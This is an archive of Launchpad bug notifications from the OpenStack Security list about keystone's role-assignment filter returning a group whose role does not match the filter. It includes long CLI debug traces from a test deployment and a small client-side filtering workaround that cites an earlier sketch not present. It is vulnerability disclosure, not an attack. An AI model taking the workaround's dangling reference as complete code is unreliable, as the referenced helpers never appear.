RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e", "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment":
"http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}], "links": {"self": "http://10. 0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True used request id req-08f9bdb9-149d-4905-96cc-99b87c8b6339 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | reader | | system-auditors at Default | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1846817/+subscriptions From lbragstad at gmail.com Fri Oct 4 20:22:51 2019 From: lbragstad at gmail.com (Lance Bragstad) Date: Fri, 04 Oct 2019 20:22:51 -0000 Subject: [Openstack-security] [Bug 1846817] Re: v3/role_assignments filtering exposes unnecessary role assignments References: <157021550823.969.5501239713217750813.malonedeb@chaenomeles.canonical.com> Message-ID: <157022057349.22121.11877560251896454973.launchpad@gac.canonical.com> ** Changed in: keystone Status: New => Triaged ** Changed in: keystone Importance: Undecided => Medium -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1846817 Title: v3/role_assignments filtering exposes unnecessary role assignments Status in OpenStack Identity (keystone): Triaged Status in OpenStack Security Advisory: Won't Fix Bug description: I have a deployment that exercises multiple system role assignments:  - An "operator" user has the "admin" role on the system  - A "system-support" user has the "member" role on the system  - A "system-admins" group has the "reader" role on the system If I ask keystone to filter a list of role assignments by --system all and --role member, I should only see a list with the "system-support" user and the "operator" user. Instead, I get a list with three entries that includes the group, which doesn't have the member role at all, it only has reader. Depending on how you classify this, it could leak information to clients. Groups don't appear to be filtered from the list since "reader" doesn't imply "member" (it's the other way around). 
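  Until the server-side filtering is corrected, a caller that needs a strict match can post-filter the response itself. A small client-side workaround sketch (the helper and its strict-match policy are illustrative, not part of keystone or python-keystoneclient):

    def strict_role_filter(assignments, wanted_role_id):
        """Keep only assignments whose role id equals the requested one."""
        # Workaround sketch: drop group (or any other) assignments that the
        # server returned with a different role than the one asked for.
        return [a for a in assignments
                if a.get("role", {}).get("id") == wanted_role_id]

  Combined with the sketch above, strict_role_filter(system_assignments_filtered_by("member"), role_id_for("member")) would leave only the system-support entry.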
"http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}], "links": {"self": "http://10. 0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True used request id req-08f9bdb9-149d-4905-96cc-99b87c8b6339 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | reader | | system-auditors at Default | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1846817/+subscriptions From colleen at gazlene.net Fri Oct 4 21:28:40 2019 From: colleen at gazlene.net (Colleen Murphy) Date: Fri, 04 Oct 2019 21:28:40 -0000 Subject: [Openstack-security] [Bug 1846817] Re: v3/role_assignments filtering exposes unnecessary role assignments References: <157021550823.969.5501239713217750813.malonedeb@chaenomeles.canonical.com> Message-ID: <157022452049.22931.11303906822352456167.malone@gac.canonical.com> Can you say whether this is new in Train, or present since Stein? If it is new in Train, we should try to correct it ASAP before the final release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1846817 Title: v3/role_assignments filtering exposes unnecessary role assignments Status in OpenStack Identity (keystone): Triaged Status in OpenStack Security Advisory: Won't Fix Bug description: I have a deployment that exercises multiple system role assignments:  - An "operator" user has the "admin" role on the system  - A "system-support" user has the "member" role on the system  - A "system-admins" group has the "reader" role on the system If I ask keystone to filter a list of role assignments by --system all and --role member, I should only see a list with the "system-support" user and the "operator" user. Instead, I get a list with three entries that includes the group, which doesn't have the member role at all, it only has reader. Depending on how you classify this, it could leak information to clients. Groups don't appear to be filtered from the list since "reader" doesn't imply "member" (it's the other way around). 
$ openstack role assignment list --names --system all --debug START with options: role assignment list --names --system all --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='', auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domain_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=False, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='', passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_project_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', username='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', 
u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, 
u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10.0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["JVQCRxBoTUyzm2CqiCoj6w"], "issued_at": "2019-10-04T18:56:29.000000Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, project=None, project_domain=None, 
quote_mode='nonnumeric', role=None, role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["U9Z3md9YTP-9-bTLuPDIzg"], "issued_at": "2019-10-04T18:56:29.000000Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}042443671367aa0183e15fd2692bf4c70d15050bdac46db883fd836440ae1065" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&include_names=True HTTP/1.1" 200 2401 RESP: [200] Connection: close Content-Length: 2401 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "c814cd4739bd4960ad08ade3814f1560", "name": "system-admins"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/c814cd4739bd4960ad08ade3814f1560/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e", "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0ec0eb48c66d4fb79c432a2ff8c5d257", "name": "admin"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0ec0eb48c66d4fb79c432a2ff8c5d257/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": 
"operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "e8fec49e15984aedb5e1235f279434fe", "name": "auditor"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/e8fec49e15984aedb5e1235f279434fe/roles/7ee093f4ccf345bba963ce765f9b797f"}}], "links": {"self": "http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True used request id req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | admin | | system-admins at Default | | | all | False | | reader | | system-auditors at Default | | | all | False | | admin | admin at Default | | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | | reader | auditor at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 The Trace above lists all system role assignments to confirm my setup locally. The following trace shows that the group is returned with the wrong role assignment based on the filter. 
$ openstack role assignment list --names --system all --role member --debug [1/880] START with options: role assignment list --names --system all --role member --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='',  auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domai n_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=F alse, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='',  passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_proje ct_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', usern ame='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'ne utron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_ version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 've rify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 
'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interfa ce': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'q cow2', 'networks': [], 'cloud': 
'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_ti meout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tas ks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_h elp': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:49 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-d5 784d4c-7b47-4647-b912-65e6a78b835e RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10. 
0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-d5784d4c-7b47-4647-b912-65e6a78b835e Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:49.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["SGRaWT8BTVuzELGwxqjBdg"], "issued_at": "2019-10-04T18:56:49.000000 